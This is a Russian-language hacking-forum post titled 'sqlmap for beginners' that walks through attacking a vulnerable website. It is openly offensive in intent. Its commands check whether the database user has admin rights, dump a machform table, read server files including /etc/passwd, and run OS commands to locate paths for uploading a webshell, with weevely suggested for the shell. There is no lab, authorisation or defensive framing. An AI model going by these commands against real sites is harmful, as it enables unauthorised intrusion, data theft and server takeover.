1. Do you speak English? Use the English version of the site! Link
    Скрыть объявление
Скрыть объявление
Здравствуй гость! После регистрации на ресурсе, ты сможешь скачивать материалы с форума и участвовать в его жизни! Для регистрации откройте соответствующую форму или нажмите на эту ссылку.

sqlmap для новичков

Тема в разделе "Взлом", создана пользователем SPIFO, 30.09.2015.

Статус темы:
Закрыта.
  1. SPIFO

    SPIFO Новорег

    Янв 19 2016 в 13:49
    Регистрация:
    27.08.2015
    Сообщения:
    91
    Симпатии:
    45
    Всем приветик ,начнем с того, что многие новички задаются вопросом как юзать sqlmap

    Начнем с самого простого ,например у нас есть уязвимый сайт ,который хотим поломать !

    Итак запускаем sqlmap -u Ссылки могут видеть только зарегистрированные пользователи. Зарегистрируйтесь или авторизуйтесь для просмотра ссылок! -o -b --current-user --is-dba

    Ссылки могут видеть только зарегистрированные пользователи. Зарегистрируйтесь или авторизуйтесь для просмотра ссылок!

    Следовательно
    current user: 'root@localhost'
    current user is DBA: True если False , то шансов порутать серв мало

    Далее разворачиваем список таблиц в базе

    sqlmap -u Ссылки могут видеть только зарегистрированные пользователи. Зарегистрируйтесь или авторизуйтесь для просмотра ссылок! --columns --tables

    И перед Вами список таблиц ,например нам нужна таблица
    ap_element_options

    Ссылки могут видеть только зарегистрированные пользователи. Зарегистрируйтесь или авторизуйтесь для просмотра ссылок!

    Выполняем слудующий запрос

    sqlmap -u Ссылки могут видеть только зарегистрированные пользователи. Зарегистрируйтесь или авторизуйтесь для просмотра ссылок! -D machform -T ap_element_options --columns

    Перед Вами список из 8 колонок ,например мы хотим их полностью сохранить

    Выполняем следующий запрос

    sqlmap -u Ссылки могут видеть только зарегистрированные пользователи. Зарегистрируйтесь или авторизуйтесь для просмотра ссылок! -D machform -T ap_element_options -С option,position,aeo_id,element_id,form_id,live,opt ion_id,option_is_default --dump-all --save

    Ссылки могут видеть только зарегистрированные пользователи. Зарегистрируйтесь или авторизуйтесь для просмотра ссылок!

    Читаем содержимое файлов на сервере !

    sqlmap -u Ссылки могут видеть только зарегистрированные пользователи. Зарегистрируйтесь или авторизуйтесь для просмотра ссылок! --file-read="/etc/passwd" --file-read="httpd/pass/httpd/passwd.conf" но могут быть и в других подразделах )

    Ссылки могут видеть только зарегистрированные пользователи. Зарегистрируйтесь или авторизуйтесь для просмотра ссылок!

    Выполним еще запросик небольшой )) Раскрывем пути ,куда в дальнейшем будем лить облочку вебшелла )

    sqlmap -u Ссылки могут видеть только зарегистрированные пользователи. Зарегистрируйтесь или авторизуйтесь для просмотра ссылок! --os-cmd=ls

    Дальше думаю Вам все понятно ! В крайнем соучае используем weevely для оболочки !

    Удачи
     
    detruit и lucefer нравится это.
Статус темы:
Закрыта.